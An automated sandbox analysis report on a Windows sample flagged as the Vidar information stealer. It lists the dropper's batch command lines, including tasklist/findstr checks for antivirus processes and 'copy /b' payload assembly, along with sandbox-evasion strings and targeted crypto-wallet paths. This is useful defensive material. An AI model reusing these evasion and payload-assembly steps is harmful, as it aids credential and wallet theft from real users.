                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: dbghelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: windows.fileexplorer.common.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: ntshrui.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: cscapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: linkinfo.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: pcacli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: pM3fQBuTLy.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: pM3fQBuTLy.exeStatic PE information: real checksum: 0xdda67 should be: 0xe2f0a
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C3264F push ds; ret 16_2_00C3266E
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C30DE6 push ecx; ret 16_2_00C30DF9

                Persistence and Installation Behavior

                barindex
                Drops PE files with a suspicious file extension
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\325114\Miniature.comJump to dropped file
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\325114\Miniature.comJump to dropped file

                Boot Survival

                barindex
                Monitors registry run keys for changes
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00CA26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,16_2_00CA26DD
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C2FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,16_2_00C2FC7C
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Found API chain indicative of sandbox detection
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_16-103834
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: Miniature.com, 00000010.00000002.2122589934.0000000000171000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comAPI coverage: 3.7 %
                Source: C:\Windows\SysWOW64\timeout.exe TID: 1312Thread sleep count: 91 > 30
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C7DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00C7DC54
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C8A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00C8A087
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C8A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00C8A1E2
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C7E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,16_2_00C7E472
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C8A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,16_2_00C8A570
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C866DC FindFirstFileW,FindNextFileW,FindClose,16_2_00C866DC
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C4C622 FindFirstFileExW,16_2_00C4C622
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C873D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,16_2_00C873D4
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C87333 FindFirstFileW,FindClose,16_2_00C87333
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C7D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00C7D921
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C15FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,16_2_00C15FC8
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                Source: chrome.exe, 00000015.00000002.1724667327.0000010400708000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                Source: Web Data.26.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: Web Data.26.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: chrome.exe, 00000015.00000002.1728868685.0000010401198000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Virtual USB Mouse
                Source: Web Data.26.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: Web Data.26.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: Web Data.26.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: Web Data.26.drBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: Web Data.26.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: Web Data.26.drBinary or memory string: AMC password management pageVMware20,11696492231
                Source: Web Data.26.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: Web Data.26.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: Miniature.com, 00000010.00000002.2125465557.0000000001BD6000.00000004.00000020.00020000.00000000.sdmp, Miniature.com, 00000010.00000002.2126388687.0000000004438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: msedge.exe, 00000018.00000003.1784294506.000071EC00374000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
                Source: Web Data.26.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: Web Data.26.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: Web Data.26.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: Web Data.26.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: Web Data.26.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: Web Data.26.drBinary or memory string: discord.comVMware20,11696492231f
                Source: chrome.exe, 00000015.00000002.1731336799.0000026C1B67D000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000018.00000002.1846062956.000002B31EE45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: Web Data.26.drBinary or memory string: global block list test formVMware20,11696492231
                Source: Web Data.26.drBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: Web Data.26.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: Web Data.26.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: Web Data.26.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: Web Data.26.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: Web Data.26.drBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: Web Data.26.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: Web Data.26.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: Miniature.com, 00000010.00000002.2125663035.0000000001C8B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: od_VMware_SATA_C
                Source: chrome.exe, 00000015.00000002.1724716741.0000010400724000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=965385b1-5c51-4270-9ac6-e4889d381090
                Source: Web Data.26.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: Web Data.26.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: Web Data.26.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: Web Data.26.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: Web Data.26.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: Web Data.26.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C8F4FF BlockInput,16_2_00C8F4FF
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C1338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,16_2_00C1338B
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C35058 mov eax, dword ptr fs:[00000030h]16_2_00C35058
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C720AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,16_2_00C720AA
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C42992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00C42992
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C30BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00C30BAF
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C30D45 SetUnhandledExceptionFilter,16_2_00C30D45
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C30F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00C30F91

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: Miniature.com PID: 7416, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C71B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,16_2_00C71B4D
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C1338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,16_2_00C1338B
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C7BBED SendInput,keybd_event,16_2_00C7BBED
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C7ECD0 mouse_event,16_2_00C7ECD0
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Cotton Cotton.cmd & Cotton.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 325114Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Grocery" Pink Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Through + ..\Aspects + ..\Except + ..\Prevention dJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\325114\Miniature.com Miniature.com dJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2708 --field-trial-handle=2508,i,6938199240973265480,1311617046375224324,262144 /prefetch:3Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C714AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,16_2_00C714AE
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C71FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,16_2_00C71FB0
                Source: Miniature.com, 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp, Miniature.com.2.dr, Releases.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Miniature.comBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C30A08 cpuid 16_2_00C30A08
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C6E5F4 GetLocalTime,16_2_00C6E5F4
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C6E652 GetUserNameW,16_2_00C6E652
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C4BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,16_2_00C4BCD2
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831

                Stealing of Sensitive Information

                barindex
                Yara detected Vidar stealer
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 16.2.Miniature.com.170000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000010.00000003.1461652856.0000000004428000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2125465557.0000000001BD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000003.1461452990.0000000001C0B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000003.1461172169.000000000443F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000003.1461338592.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2126191611.00000000043A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000003.1461229379.0000000001BE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000003.1461592581.0000000001C8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2122589934.0000000000171000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Miniature.com PID: 7416, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: Miniature.com, 00000010.00000002.2123806267.00000000015CC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *electrum*.*
                Source: Miniature.com, 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
                Source: Miniature.com, 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
                Source: Miniature.com, 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: Miniature.com, 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
                Source: Miniature.com, 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Exodus\
                Source: Miniature.com, 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: info.seco
                Source: Miniature.com, 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
                Source: Miniature.com, 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: passphrase.json
                Source: Miniature.com, 00000010.00000002.2122589934.000000000024D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
